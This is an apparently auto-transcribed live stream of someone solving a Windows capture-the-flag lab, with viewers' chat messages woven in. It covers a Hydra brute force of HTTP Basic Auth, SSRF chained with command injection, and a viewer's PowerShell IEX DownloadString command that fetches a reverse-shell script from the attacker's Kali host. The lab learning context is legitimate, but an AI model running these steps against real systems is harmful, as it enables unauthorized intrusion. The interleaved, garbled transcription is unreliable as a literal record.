Blizzard WQ. Thank you for the like. It's correct. Good. So let's continue now. So we can do without burp. And all the other information we could have had in burp, which was probably useless anyway though, but it's gone anyway. So we get access forbidden to this one. Because it was open still. And this is the Apache port, so we actually got something now. So, since this is not the one that was suggested, we have progress. We started the machine and at once it just works. Was it admin or admins? Admin, right? I think so. What? It's asking me to sign in like this? Okay, I've never seen this. This is new. Cool. Let's... Yeah, we have progress. The progress of actually being able to get a new reply from what's it supposed to be?
Try admin.
Yeah. I'm thinking my brain is a bit of mush now, so I usually say don't suggest stuff, but now you'll all clear, everybody. You can suggest stuff in chat, okay? Before me trying stuff, you're allowed to suggest what I should do, because I've been streaming for 9.5 hours, so you're all okay to. But usually it's let me try first. So I don't want suggestions usually before trying, but now I do want them. And admin, of course, but you know, I don't expect it to work. We could do lots of different things to try. But what I want to do now is to turn on burp, which means we need to start burp. So we can play with things and see what's actually happening. I wonder how long this VOD will take to upload to YouTube. By the way, I should add the new
Cocaine 1 PT says.
Link there.
Hint, search for Hydra basic authentication.
Okay. Hydra basic authentication. Okay. Yeah. But why would I search for it? I want more. If I don't just want to search for this, I want why. Does anything here say Hydra? Because, you know, for me, Hydra is trying to brute force stuff. You have to tell me more. And I think I may just switch earplugs to the other ones that have a different way of connecting to the ear. We'll see if it falls off.
Generalissimo for 69 says.
The login for Mersing is called HTTP Basic Authentication.
Okay, thanks. So then we need to add this to our notes. So if I switch to my Windows machine and print screen, and then we go to a
Hydra should be
editor.
used because we can make an educated guess that the username is admin.
Yes, yes. So that's all logical. I was just trying to connect Hydra with this.
The password is very simple.
Yeah, okay. So we can just hydrate, but yeah, okay, so I can just do Hydra on it. But I still want to, the new thing for me here is not Hydra, but it is that this thing is called HTTP Basic Authentication. I'd never seen it before, and I never heard of it before. Because, what? Do people use this? So I need to make a note. So let's do that. This thing here. Should we even like this? This is just in the browser. I want to show that this is, you know, it's in Firefox, and I want like a hint of that it's what it is there. So if we copy this and we go to the Obsidian notes, so let's go to the actual notes here. And since we have this tab pinned, it will open a new one if we open one. And this is web, so we'll make a note called HTTP basic authentication, right? Authentication. Did I spell that wrong? And then we paste the image. So then I know that that's what that's called. You know? There's no thing to right click and check for the code here. It's just, or is there? Is there? Can we right click this? No, we can just select all on it. So I've learned another thing today. I'm learning stuff, so I think I'm starting to get a tiny bit tired too. But we'll finish this as long as it doesn't take hours and hours still, because it's just 17:53, and I can say the time right. 17:54. So it's almost 18. It's not like it's midnight or anything. but I went up at 7 today. 7. Yeah, so then we can go to my Hydra notes, because I know in my Hydra I have for HTTP if there's anything special. It's like brute force. We have Hydra, and we have from some room and some other stuff here. So so maybe I should just type, and I have my own example somewhere too. Here, like, yeah, right. I remember, of course, the L and the P, you know, and use the simple list. This is not a form. This is just a normal one. And that's normal post. No, that's also the form one. God, I am actually starting to get tired. I can feel how I'm getting tired. Let's skip notes and just do it instead. I want to make my notes better, but I also want to finish it, since we've been going for so long and not having any progress at all, almost. So if we just Hydra, and yeah, let's keep VT, and let's try admin. And Rock You, what do you think? Is it too big? You said a simple list. And it's not FTP. Can I just do HTTP here? What on earth is the IP? Because now I usually remember the IP, and I haven't even put the last
Rocky
IP
is too big.
in there. Yeah. But do you have a suggestion? What should I use instead?
Do a word count on it and you'll see.
Yeah, I know how big it is.
Fast
you know,
track
I
text.
didn't unzip it. Fast track txt. Okay, maybe I have that one. Let's do a separate tab, and let's look into the word lists directory.
It's in the same dear.
Yeah.
Cocaine 1
yeah.
PT says.
Same folder as Rock You.
So let's look at this. Fast track, there it is. Okay, so we'll just lazy. Let's do the IP first. I have to look at the boxes page, because I have not put it in the notes, which is a sign that I'm tired too. So there's another IP in the notes now. There, we got it in the notes. So let's, before I paste it, remove all of the IP, since I copied all of it, and then let's F. Will it autocomplete? Yes. Good, thank you. Oh, what did I do now? Is this correct? I'm just going to try it, you know. Do I need to say anything else for it to realize it's HTTP? Well, is this good? Or should I should use the web address, of course. Why did I do the IP? That's tired. Also, is there a special way to add the port, or should I just do colon? Yeah, S. Okay. Yeah. Good. So, there, and we do S. What does S stand for? Oh, I thought I copied the HTTP.
Generalissimo to 69 says.
HTTP get.
HTTP get. So let's hop you along to my notes here. Oh, we have 2 Hydra open here now. So I'm just checking my notes. It's just there, and then I just do this for the. This is HTTPS. I guess it's the same. Yeah, like this, right? And this is for. This is the IP, and then it's this afterwards. And then I have the port here.
This is the post request. You need get D.
Yeah, I know, but I'm just thinking where I should write it, And this doesn't say HTTP or anything, but it says this instead. So I'm just going to change my text here while I look at the notes.
Before the address.
Yeah, so we need this, and we need to change it there to. So you said get, HTTP get, and we don't need these, or rather we can't use them. I'm just going to compare with my notes here. P for the password.
Enter.
Yeah, I just want to check it all. This seems to be consistent with my notes. But I have not, I don't know if I've done HTTP get. So I'm going to copy this and put it at the notes too. We're adding to the notes, Sorry for not switching there, but...
For HTTPS, it's HTTPS get.
Yeah.
This is HTTP D.
The D in the the D in the TTS kind of what? I have to look at the chat. Okay. Did I type HTTP and it's supposed to be HTTPS? Is that what you meant? You'll have to help me. The more time passes by, my brain is slowing down, and it's 9 hours and 40 minutes. And I don't even take the time to eat my food. I'm just scrolling up to the HTTPS one, and this is also a post form. That's interesting, because this, I think most of this, I've added stuff, but most of it is from our Hack Me Room. So let's just run this now. We got an unknown service error. So was it the S that it needs HTTPS? No, that was not the problem. Let's do the suggested Google. I didn't do the suggested Google. So I'm copying the simple text, because then my brain don't have to type. We're going to Google it. So let's just get a command. HTTP get. We don't have a path. So this is kind of what we did, right? Though we had not a big L because it's not a list. And this one also has the options. We don't have any. Or just the S. I found something. The S. Let's see, the S. I noticed the S in... I had it in one of mine. Yeah, this is -S. And they were not doing -S. So that should still be okay then, right? Because they do S:200. But this is the question and they don't know. Why should I look there? Yeah, they do S-S. And F for site. Should I do F? We get the same, which I expected, because it's sounded right. Well, so let's back. Well, this is some kind of... Is it... Oh, it's just text. Okay, it's a tool. I think we might be missing a dash. That's normal slash. Or maybe it's order. Yeah, now it said unknown service slash instead of just unknown server. I'm thinking some kind of syntax thing. What if I do this? So if we change our order of this to be the same, so also
HTTP get.
Yeah, I did that first. We get the same error.
I said HTTPS get in general.
Yeah, but it doesn't work with... I tried that first.
Remove the slash.
Yeah, that's what I had for... I'm just trying to add stuff to make it work better. And we got this. I also added the F. So if I remove that, we'll have what we had from start. We could remove the 50 threads, but that feels really stupid too. It shouldn't work. I know that I had problems. I put these
The
here.
F is for stopping when it finds the password. It's default anyway.
Okay. So, should we, just to minimize the command, we could remove these, you know? So we have just
something is wrong with the
admin.
address.
Yeah, but what? That's why I tried adding the slash. We can use any of these when we find the error. So what I have on my screen here, so this is C, I know is for both, right? User and password or something. No? Anyway.
Try HTTP get after the address. Maybe it's that.
Yeah, that could be it. There's definitely some kind of syntax thing. I have to click again. You can see it now, right? So let's remove this. But this is the best kind of learning, because when we find it, I will remember it, right? So I have never had a problem with the Hydra command, I think. Yeah, and now it works. So I'm going to abort it and add the VT. And we can remove the F2
Whatever,
there.
D.
Whatever. Whatever about what? Maybe it's nice. It's nice to have problems, because if you don't have problems, you don't remember what you were actually trying to do, right? It just pops out of the brain.
Christy says.
It's when we have resistance.
I always have trouble with Hydra
It's when we have
commands.
resistance we remember. So now I will remember that you're supposed to do the address first and then the HTTP
Having
get.
problems in each stage is annoying.
Yeah,
Cocaine
it
1
could
PT
be.
says.
Magic now. Voila.
Translated from French.
So, we didn't find the password?
Generalissimo for 69 says.
00.
Cocaine 1 PT says.
Something wrong.
Generalissimo for
Threads.
69
Okay, it's
says.
going too fast.
Remove the threads. It's doing it too fast.
Cocaine 1 PT says.
Remove the T.
Generalissimo for 69 says.
Thanks, partner.
Cocaine
Thanks,
1
guys.
PT says.
D.
It's still going quick, but not too quick. Oh my god,
NT
if I had
Generalissimo
tested,
for
I would have
69
tested
senpai.
password 123 if I hadn't been so
Translated
tired.
from Indonesian.
Because that's
Generalissimo
like the
for 69
default
says.
one, right?
GG.
Translated from Latvian.
Yeah, so let's just add this to
Now
the
the hard
notes.
part.
Yeah, I'm almost like
Cocaine will
forgetting
help
to
you.
make notes.
Christy says.
Wow, that password.
Yeah, like we shouldn't have needed
Cocaine 1
Hydra,
PT
right?
says.
Generalissimo for 69 is the best I've met for this part. For sure he knows what to do.
Okay, let's see now.
Generalissimo for 69 says.
I do.
So let's go back to our notes.
But it's fresh in memory of cocaine. So he said he would help with that.
Cocaine 1 PT says.
Actually he is the best of the best. Like CR7.
Christy
you keep
says.
saying cocaine.
So it was from the sweet admin. D.
Oh, we'll see indeed. So new note, and we have Hydra.
Generalissimo for 69 says.
More of a mazy guy actually. Just taller.
And let's scroll up. I just copied and pasted, made a file.
Cocaine
And
1
put
PT, you
this-
think she knows soccer references? Shame on you.
There. And there. Just pasting it in the other
Cocaine
file.
1 PT says.
She does. I believe.
Generalissimo for 69 says.
We were
Do
just
you? Fix it.
failing. I'll check in a second. I just have this in my notes now. So we don't have to have all the attempts here. But just that we found it here. And this is the line that's interesting. So we're adding this to the info. There. And that's all the information we need on the
Cocaine 1
password.
PT says.
Well,
So,
gotta take a break. BRB in a minute.
Okay. Soccer references.
Generalissimo for 69 carry
sorry.
on. You know the drill.
Let's see.
Generalissimo for 69 says.
I'm gonna replace you real soon, Cocaine 1 PT. You deserve it.
Cocaine 1 PT says.
Lul.
So let's see now. So let's go to the web
Generalissimo for
page
69 says.
and use our
You'll be
very
on the bench.
I should have. I would have tried this. I would have tried password and password 123. That's the only things I would have tried. Because 123, I don't know how many times I've seen it in these things.
Well, I'll be back.
Okay. See you later. Thanks for being here. So we now have an ultimate search bar.
1984 reference.
Translated from Slovenian.
Nice.
Okay. Is it that long ago, actually? So, this image looks kind of funny. What is this? So, a query. Submit query. Hello.
The image didn't load until the end there.
Okay.
Refresh it, frown.
Okay. It's supposed to be more... Oh, look. It's up there. Or this... refreshing didn't work. I could like...
Frown.
Not even
Problems
control
each
F5. So it's supposed to look...
Unbelievable.
Yeah. It's supposed to look different. It's not supposed to be a tiny thing. Huh? Is it seriously... Because I can see the R hello there.
Open it in a new page.
Okay.
The picture. It's good.
Oh, look. Oh, nice. Oh, and I didn't get to see that. So thank you.
This is art.
Yeah.
Not that I'm sure what the hell this is.
Oh, dude. Looks like some... Oh, well. Whatever. So, anyway. We don't know what this is, and I
Probably
feel like...
some anime.
I've got 1,000 eyes on me here now.
Weebs will confirm.
Yes, probably some anime.
Christy says.
Art anime yes lamau.
Generalissimo for
Oh
69
my god,
says.
I just saw the
Thanks,
stream
Weeb.
time. People. Am I crazy? 1 second, I'll go just check with my family a bit.
Christy says.
Dick.
Translated from Dutch. Generalissimo for 69 says.
No need to call me like that. I was just kidding.
Christy says.
Ha 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 d.
Translated from Tagalog. Generalissimo for 69 says.
Kappa.
Translated from Icelandic.
So should we just do this like quickly? Hint level increase, and I'm thinking maybe I shouldn't stream. This is the longest I've streamed, and
what about
I'm
the other page?
Yeah,
Webland.
we have that one too. Here. Do you mean that was a hint to refresh it? No? We can contact the webmaster. And we have an email here.
What happens if you query it? As the input in that submit form.
Yeah, of course. Should I stop this and wait until I have a brain again?
SSRF.
Translated from
Yeah,
Somali.
but I'm not good at that. I'm just learning, so I need to like take it easy and steps and look. And what I was googling here.
No one is good at that.
Okay, no one is good at that. But what I was actually googling here was different things. I couldn't even find my phone to switch screens.
Except cocaine.
Oh, I was googling
But he
different
walked away.
things like this. And
Cocaine 1 PT bitch.
family friendly people. So it didn't. The auto check didn't stop that, by the way.
He helped me with this step actually.
Okay, cool. So I will look at my notes.
So he could explain
I
it
don't
better,
have much
Kappa.
notes. Okay, so but I'm really not in much of a hurry, but it would be nice to do it while I still have your support, you know. So at this time, I'm streaming 10 hours. My brain is a bit mushy, and if you just tell me do this, do that, it would be kind of okay. But let's just look at the notes and stuff first. I don't
think
have
he is
much
the creator
notes.
of the machine too.
Oh, okay. He said something about... I didn't really get what he said, though. Well, I can't scroll up in chat. How far here? Anyway, I think he said, but just made it just now or something, but... so I didn't get that, because it's not all new like that, you know. Let's just continue. So maybe I shouldn't close this. I started like where is it? I started making this document yesterday, and I'm going to add lots of stuff here, and I'm going to go through where I got the information again, and I think I have some other notes somewhere on this, but I'm sure I have other stuff like
one injection here actually works. Smile.
Yeah, so you think one of these works? Yeah, so I have also SQLi more things, but not just this. My notes are a kind of mess. I'm still trying to sort them out. Yeah, because I have lots of SQL stuff here, and I realized maybe I should put them under web, because where else would you use them, you know? Maybe somewhere else, but mostly there. So maybe at least under web we should have SQL, not Linux. So
BTW, it's a Windows
around.
machine.
Yeah, I know.
ID command isn't available.
Yeah,
Smile.
I know. This was from yesterday. This was from yesterday. So so this thing should supposed to test a lot of things. And we have lots of SQL stuff here, if it's supposed to be SQL. Yeah, right. Tell me if it's SQLi or not, so I'll know that much. Because I'm really...
Command injection.
Yeah, it's command. Okay, so
Not
then
split.
we should go for Windows things, which I'm really bad at too. Though I started using Windows before everybody was born, you know. Or like DOS, of course, then. So, do we even have things like that here? Yeah, like PS, PowerShell commands thingies. I've got these things.
Christy
Is
says,
there anything in there?
Type anything in that box and send it to Burp.
Yeah, and we could do like type stuff. What is this? Like I said, my brain is kind of dead. Oh, I've sent something. You mean this one? But this is the one where we should add stuff, apparently. So we have Bark, so we already have this sent, but we can do like again. And for a second thought I was typing it in chat.
Try it.
So if we just do it on the other one. What? Oh, this command. Okay. With R.
Christy says.
Put scene.
I'm kinda confused. So why would it be R even? But you think I should use this command? And this is not even, we don't have anything in here.
Generalissimo for 69 says.
Sure, why not?
Christy says.
We can't see what you're doing, T.
Generalissimo for 69 says.
I'm not doing anything.
Although URL encoding would help.
Yeah, so I was thinking I'll just type hello here and then we can go to burp. So this at least was sent and we still got the same error message. So let's lazy stuff here. So we have both of these here now. We can just do them to repeater. And we have, was this one empty? Okay, this is nice. That feels like a bug. What did I really click? Did I click outside? So which one did we get here? This is admin. So if I go here and click the eternal one, it is actually empty. Yeah, it's all empty. Why was it empty? Could someone explain? Was it? No, it's not empty. It's not just me. It's also my computer being tired. So, this will be. I will have some fun at myself when I look at this, and see like, I didn't try password 123. That is, why not? Why not try it? Because password and password 123. I just looked. Oh, it was just my Discord message. So, when we
Christy,
sent
take
this,
over. I'm tired. Smile, smile.
Oh yeah. So, okay. My God. That's lots of styles. My goodness. The tiny formy thingy. And then we have the internal one. And that's what I typed. Did I send this? No.
The injectable parameter isn't really here.
No, and I guess it's not R we're supposed to type, right?
The attack here involves SSRF plus command injection.
Yeah, but I don't know what SSRF is. I could try and figure out what the letters stand for, but just tell me, because I'm too
That's
tired.
why I suggested to try query web link.
Yeah, okay.
Server-side forgery request.
Okay. Because the shorts I need to, like, they're going into my notes too.
You send requests on behalf of the server.
Yeah.
Admin page in your case. To internal in this case.
Cool. You know, I think I've done that.
But not to admin.
Okay. Well, since this is so hard, and I'm very tired, so it's okay if you just tell me what to do, because I think that I shouldn't stream much longer, because I'm like really falling asleep now. I'm very tired. So, yeah.
Query web link.
So what about we use this? I prefer this too. We have it here.
In the input form there.
Okay. So if we add its own address.
In the R equals.
On this machine. On this page. Let's see which page. This is the admin one. And I'm so tired I don't remember which one is which. So admin is the one where we can access stuff. And this is the other
on
one.
admin, yeah.
Yeah. So here, let's type it here since I'm here and I had it copied. If we submit this, let's remove these.
Without quotes.
Yeah, I noticed the quotes there. You can find your name here. Name. And then it goes here. And the
you
difference,
see the link?
Let's see. Requested directory.
You can't access it on your behalf. But on the behalf of admin you can.
So if we do admin here, it's nothing.
Try to give this parameter, name equals, a value.
Yeah, I did.
Not on your behalf. On behalf of the admin page.
On behalf of the admin page. I'm sorry, but I don't remember
Web
what
link.
I just did.
In the submit form.
Okay, so add it all. So add all of this. Yeah. We can go back again.
Everything will on behalf of the admin page, SSRF.
Yeah. Because now we weren't that. Oh, so it says now. Okay.
The name parameter is vulnerable to command execution.
Okay. So now we have a way to
You already
do
have
commands.
the payload.
Yeah.
Test id.
Yeah. Oh. And I didn't joke when
But
I
instead
did.
of it,
I said I
give it a
didn't
Windows
remember what I
command,
just
D.
did. I didn't remember what I just did. So this will be slow because my brain has stopped working, like totally. Let's just do this and repeater, please. And we have this. So it's the admin bit we should replace then. Just this. Waiting for an answer. And then we need to, if we should do this command.
Test, who am I?
Okay, you're typing things in. I'm not reading it. Maybe, do you think I should stop streaming now? Or is it still okay for you to be this tired? So, okay, if we do, could we
That's
do
your call.
Like test here? Test. But what? You mean like this? I'm sure I will learn something and I will look back if I don't remember stuff. No, not like this. Maybe we should do the render
I was referring
option.
to the payload you already had. Read again.
Oh, right. Oh, look, it looks right on this. Observe. Firefox didn't render it correctly, but Burp did.
It doesn't work on Windows.
Oh, right.
Who am I does.
Yeah, how my works. But didn't I need to use name admin and then something else? Or is name equals is the thing? And then we change this? Is that much correct? The first word
the first word doesn't matter.
Alright, so let's, I removed too much.
What comes after pipe does.
Yeah, so we can
just
have
like
whatever.
In your payload in your notes.
Yeah. The thing is that in this payload, I think, let's see,
not this one.
No, not this one.
Where you had test vertical bar id.
Okay, that one. Because that's why I didn't understand. Part of it, lots of it is also that I'm very tired. It's not here, because it was somewhere else. It's not the fuzzing thing, it's... My god, injections to test here. This, you meant this. Yeah. I didn't have anything else here. So you're saying that I should just do who am I? So if I go back here, I failed to type a pipe, so let's try again. Just checking we didn't have more characters. And who am I works on Windows too. And we got a reply. That's cool. And as we use the pipe, the thing before doesn't
smile,
matter
smile.
then. Yeah, thank you.
That's the command injection part.
You managed
over SSRF.
Yes, you managed to even get my tired brain. But then I was kind of like, it's good to have tested it, but I was kind of looking for what we could use here. So that's where I was thinking of this Windows thing. Since just by the confirmation of using it should work, you know. So great that we have tested it. Thank you. Do you have any suggestions what we should type instead? Because the one I had here, let's see, it's not complete. But I have another one I know that I have used.
We should get a reverse shell.
Yes, and it was my reverse shell. Where is it? Let's not look at that one, cause I can't find it. Am I blind?
Cocaine 1 PT, he is back.
Okay.
And he is the creator of the machine. Answer to us, master.
But I at least have a clue what to do now. So let's just. My God! Now I'm asking my memory to remember the URL to that shell thingy. What is the shell thingy? If I type shell here, will it pop up? Yes. This is the official name. I'm kind of tired now, you know. So. But I like to call things.
There are many methods
anyway.
to get a reverse shell here.
So I'm just thinking, let's just look at this, cause there are ones
My
here.
method involves installing stuff.
Okay.
So you should probably stick to your guns, smile.
So if we don't URL encode, we can actually read what it says at once first. And we couldn't encode it before we changed the IP anyway. How come there's not how come there's not a field for entering your IP? And there is.
It's
right?
a web request, so include encoding, obviously.
Yes, but I just was thinking I needed to change it manually, and I don't. And I want. If I hop to the box here, to my virtual machine, and just open. Have to think to open a new tab, and there we have netcat started, and okay. Why did it do that? So let's my IP is I have to check it. There, and let's do. Well, I was just looking for the shortest one. We can do the first one, and we'll URL encode it, and we'll copy it, and go back to the other screen, and go to burp, and then we make it crazy long. I've never had this long get line, you know. That's crazy long, but let's try it. Oh gosh, I can't read this. Okay, should I just think this didn't work and do another one, or did I overwrite stuff? No, it starts with the right thing. So I'm just
the server doesn't understand frown.
Yeah. So let's do the other one. It might be a very long thing. How else could I send this? Can I send this in a different way than in the first bit? I can't select text here to make it readable. So I guess what we should do is to have a like an automatic jump down here, where it's actually the text.
You could host a PS1 script on your Kali and invoke expression to load it into the memory of the Windows machine.
Yeah. I've actually got a script on the machine, so I on my machine that I could just host.
Did you ever do that?
Yeah. I actually have.
Then it's easy. Smile.
Did you spark? Plug it in, and we got there. So if I'm lazy, I could just look in my Arduino Studio for the command even. Let's just see here. I moved stuff, so it's in the shells directory. So let's go to. Did I fail? No, I just didn't type enough letters. And we have PS1, and my IP should be the same.
PowerShell.xcix new object net.web client. Download string http://kali ip/rivshell.ps1. Should be URL encoded.
So, my god, my brain is slow. Thank you for supplying the rest of the line history. Oh my god. I feel how slow I am, you know, but it doesn't help.
Don't forget to open a listener.
It's already opened. But we also need to look at the actual script so that I have the right IP import. I'm kind of sure it's right.
Is it the right port in your script too?
Yeah, exactly. So let's see if it is. Yeah, it is. So, was it the right file? No, this is a PHP one. You see, I'm tired.
PHP won't be parsed.
No, I know.
You need a PS1.
I was going for this one. So no, because this was actually. Let's save a copy of it. And call it
443.
Yeah, but the IP,
Just
the
change
IP is wrong. Yeah. So I'm going to call this revsh K for Kali, okay? Because this was when I was doing with my Windows computer locally. So it had the local virtual IP address. Because it was for the Digispark. So just another ladder.
I see Cthulhu there.
Yeah, this is.
Shout out to Al.
Yeah, Al. We'll have to shout him out. So this is Al's thing. So 10.18. Cheating 21.236. I have the same IP all the time and still don't remember it now. Good thing I did check it. So let's save. And I clicked also a graphical key instead of Ctrl S. That's also not as. I'm very full of energy thingy. So let's. Actually, I think I'm going to look at what my command I have used is. Cause, and as I said, I think I have it in the old Arduino Studio. So let's see, recent, this one.
If you don't,
Here.
that's the command to inject, encode it, PowerShell.xcix new object net.web client. Download string http://kali-ip/rivshell.ps1.
Yeah, so let's it's the same thing, right? So I have IX, you have PowerShell C, and I have just PowerShell, and then I have special characters there. And you don't. So maybe I should use yours. So it's the same, right?
It depends where you insert it. But it's basically the same.
Yeah. So it's not the C, but we also have these characters around it here, so
if it's outside of PowerShell but with command injection, you do need the C part. Which is the case right now.
Yeah. That's good to know. So C, what does it stand for? I hope I remember this, though my brain is starting to feel like it's foggy
Command.
physically. Command.
Same as
Yeah,
SMD/C.
Thank you. All the information. I'm going to listen to this again and look at it when I'm not as tired. So even if I don't remember things right now, so let's go up to the actual notes there too, because the next step here is actually web. But I will have to... I didn't have put a number before Hydra. That's tired too. The things that I always do is not...
Same as your PS command in the notes you just showed to D.
Oh, right.
You just had PowerShell command.
Yeah, exactly. So, oh, right. And I'm great at spelling today too. So 10.5 hours of streaming. I feel kind of like I'm allowed to be a bit off at this stage. This is not good. We don't want that. So let's do this before we paste. Otherwise, strange things happens. It happened anyway. I know how to fix it. I Control-Shift-V there. So it thinks this is a URL. So it's trying to do funny stuff.
Nice.
So, let's now fix this. So we can have the 10.18.21.236 there.
Don't forget port 8000.
Right. But, yeah. I'm really tired. Sorry. And I even had this up.
You hosted on
just
port
now.
8000,
Yeah.
the Python server.
This is just since this is local and not on VPN. Or local, virtual even. So let's copy this, and I also want this converted here. So we're going to paste a base64 version of this, and I will. For me, I think the easiest way is to just
not base64.
Echo. No, what did I do? What do you
URL
say?
encoding.
URL encode. Can I URL encode it here? I want to. Maybe I can't. I'm just tired. We can just do it here, right? So if I paste this and I do this, can I right click it?
Yes.
And then do convert URL encode, not decode. Oh, all characters. Let's do it. That looks crazy. So let's just send it before I even think if I did everything. and it kind of hangs, which is kind of good. Nothing here, nothing here. So we're not correct, at least yet. So nothing from the HTTP. Oh, we didn't change the path. I added a character.
Guess it's too much encoding? D.
Yeah, but also it's the wrong file name. But you should have at least asked here. So maybe too much encoding is the answer. So if we undo the encoding and we encode it again, but first we need to. It's called refshk. That's the name of the file. But he should have tried to download the file, even if it was the wrong name. And I should, before I forget,
just encode keychars.
Yes. So
Control plus U.
Translated from Indonesian.
Okay, so Control U. I'll do it this way until I have learned it. There's a Control U. So Shift for decode and U for encode. Good. So I was going to remember to shout out Al, because I didn't. So let's do that. And am I supposed to remember how to spell his name in my current state of tiredness? I have to cheat. Let's go to Twitch. And I just have to click the search one. Let's see. Don't start talking now. There. And
Christy says.
Who?
Generalissimo for 69 says.
Yeah.
L4ZR3D.
Translated from Slovenian. Christy says.
I did this. And I had it up here in the search, because I searched for him before, you know. If you want to hop into the channel before it goes live, it's the easiest way.
Generalissimo for 69
so,
says.
follow Alhasred, everybody.
Christy says.
Not mine.
Oh, he's supposed to stream?
For
yeah,
69
it's
says.
okay.
He's supposed
It's
to stream
Friday.
tonight.
He
Christy
said he would
says.
stream in the
Prolonged
morning,
D.
right? And that would have been earlier than this. He was I think he said
His cult, he
co-working.
can keep it. D.
I love his streams. I learned so much.
Generalissimo for 69 says.
Night for us, fix it.
Yeah,
D.
yeah, night for us.
I'm GMT plus at.
Yeah.
2.
And now I'm +1, so. Yeah, I know you told me before. We're 1 hour apart, I know. I don't even remember if I even sent this. So, and also, failed to connect. Reminded me to extend the time of the box. Just to make
Problems
sure.
again, frown, frown.
Yeah,
Send it anyway,
we'll send
D.
it. And there were 44 minutes left, so. So, no,
Do we
this
get
is
a
the
rev
wrong
shell?
one. This is the wrong one, because we only encoded special characters, right? So, something went wrong there. PowerShell, download string, and I fixed the name. And when I had fixed the name, I didn't do the right one.
Cancel it then, D.
I have no idea how to cancel. There? Oh. I've never seen that button before.
Near the send button.
That's why it's so obvious I'm a noob at this, right? Now we don't have all the stuff there. So let's send. Just special characters. And I forget that I can tab. We have still
Check the terminal.
no one. I love it when you say something, tell me to do
Too
something
bad.
that I'm already doing. Yeah, so we don't get... Let's just start by just downloading a file then. We don't have to run it. How can you download a file in PowerShell? Simply possible like this. So if we undo the encoding again so we can actually read, this does PowerShell exe, and we know that we can run HomeI. We do CIEX, new object.
J works in PowerShell.
Yeah, so let's we'll have this still if we do another one. But can I, like, if I do send to repeater, yeah, it worked. So we got a new one with the same stuff, so we can change this more without losing our thing we already was working on. There. And since it's apparently 19, this triacme popped up and telling me
First check who am I
study. Yeah, we did
to
who
see if
am
the
I.
connection is still stable.
Okay, let's do that. Not in the wrong place type, in the right place typing. So now, who am I? See if it's still awake. I don't think it took this long, right? But now we don't have to change much. We just have to change the host file when we restart it again. What do you think? Is there a reason not to restart it?
Frown, frown.
Fourth time? It worked. We could turn it off. So, start it again, waiting for the new IP. So, I'll actually eat a bit. Maybe I should... I'll go get a glass of nyponsoppa.
Xai says.
Can't restart it in real life.
Christy says.
Windows boxes are a pain.
Generalissimo for 69 says.
Size I even heard there is no respawn in RL. FPS Doug reference. Old people will understand frown, frown.
Christy says.
You can't restart it in real life, but in real life won't faint like THM or HTB.
Yes, I really have to switch ears again.
Generalissimo for 69 says.
Weblink. It's short tongue.
Oh, shite. Oh, gosh.
And old, D.
Where? Oh, plugged it in the wrong side. So we have that one charging. So my ears are starting to feel that this is 10 hours and 40 minutes of having ear stuff in them.
You can watch it while it's loading. Fix it, D.
Yeah, sure. Oh, no
I
audio.
haven't seen you since last time. How's it going?
Pretty bad, actually.
Right on.
Jeremy quit the show.
That's Jeremy, dude.
So do you want to be the star now?
Me. Let's do it. I'm playing some CS Source right now. We can get some footage of that. Go back! Yeah!
Upload 17 years ago. Amused. Wow.
Boom, headshot! Boom, headshot! I can dance all day! I can dance all day! Try hit me! Try hit me! Come on! Boom, headshot! Yeah!
17 years ago.
Take that, bitch! So like, this is my PC here. It owns. It owns!
Well, I don't think I want it all right. Let's see. It's been 3.5 minutes.
Cocaine 1 PT says.
CS. Long time.
Generalissimo for 69 says.
Here is the creator of the box Smile Smile.
Cocaine 1 PT says.
What?
Generalissimo for 69 says.
You.
Cocaine 1 PT says.
What you talking about?
Generalissimo for 69 says.
It's him, fix it.
Oh, I'm not sure. He thinks so?
Cocaine 1 PT says.
No clue what's happening here.
Christy says.
BRB.
Okay, Christy. Thanks for being there, everybody.
Generalissimo for 69 says.
We'll see her. So,
He's just shy.
Cocaine 1 PT says.
Unscrub can even access web pages.
Generalissimo for 69 says.
Cuz he rated this as hardbox, but it's easy.
Cocaine 1 PT says.
Can't. Generalissimo for 69, that actually makes
someone
sense.
saying they can't access web pages. So what are we doing here? We're waiting for this one to reach like 53-ish. But we can edit the host file, so we can get started. So let's go, and you'll have to be my double
56
check.
is enough. Access the page.
Yeah, but we need to check the host file, you know.
And you can see it's enough. Tongue.
Do we dare to do anything? We don't have to. What if it just kills everything again? So let's sudo mono.
Generalissimo for 69 says.
We've done this so many times.
Very
It's the
fragile
first
machine.
Suggestion. Yeah, it seems
Bad
so.
job on your part, Cocaine 1 PT.
Cocaine 1 PT says.
Indeed.
Generalissimo for 69 says.
I'm glad you agree that you did a bad job.
So I copied it. I'm pasting
Cocaine
it.
1 PT says.
If it's not right, it's the
Generalissimo for
computer's
69,
fault.
did you expect something different from me?
So
Generalissimo for 69
10,
says.
98,
Obviously not.
67. 10, 10, 98, 67. So, saving. We have these
Cocaine
things.
1
Let's
PT
see.
says.
The web
That's it.
server is waiting, and this is waiting.
Go for it.
Generalissimo
we can
for
close
69
this
says.
one.
I need a new THM partner.
So we'll see
Cocaine
first
1 PT says.
something getting this.
You can do it.
Generalissimo for 69 says.
Who want to be my partner?
Cocaine 1 PT says.
Generalissimo
Remember,
for
this is
69,
family
then
friendly, people.
D.
Family friendly.
Generalissimo for 69 says.
So
Stone.
why is this who am I? Because it didn't answer to who am I.
Cocaine 1 PT says.
I see now. You can't discard me, tongue.
And now we have a working machine again. Look.
Generalissimo for 69 says.
Family friendly with a person named Cocaine.
Cocaine 1 PT
Yeah,
says.
indeed.
Ahaha.
Translated from Italian. Generalissimo for 69 says.
I'd ban him, to be honest.
That's why I was like, why don't you say all the name?
Cocaine 1 PT says.
Why the heck this translated my ahahaha?
Oh, right. Yeah, don't do
Generalissimo
the...
for 69 says.
Exactly what I was about to say. Don't say low,
Translated
because
from
that'll
Dutch.
be, TDS
Smile.
coming bad.
Cocaine 1 PT says.
Fury.
We love to
Translated from
family friendly the
Aha.
TDS
Translated from Italian.
security live knows all about it. You can see what I'm seeing, right? Come on now.
Generalissimo for
Come on
69
now.
says.
Yeah.
Cocaine, shut up.
Translated from Hebrew.
Come on,
Cocaine
people.
1 PT says.
Now
And see
you will
TTS.
have to.
Translated from Polish.
My brain is trying to think here, people. If we send
Generalissimo
this
for 69
now,
says.
you'll
Okay,
miss
Jill.
it. You'll miss it. You'll miss it if it works.
Cocaine 1 PT says.
We are friends, no worries. We will chill now.
So, what have I missed? To this machine, my IP,
Generalissimo for 69 says.
8,000.
Not for long. I just need to find a new THM partner here.
Cocaine
Oh,
1 PT
look!
says.
Look!
Ha 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 ha.
We have
Translated
we
from
have
Tagalog.
some HTTP. Look.
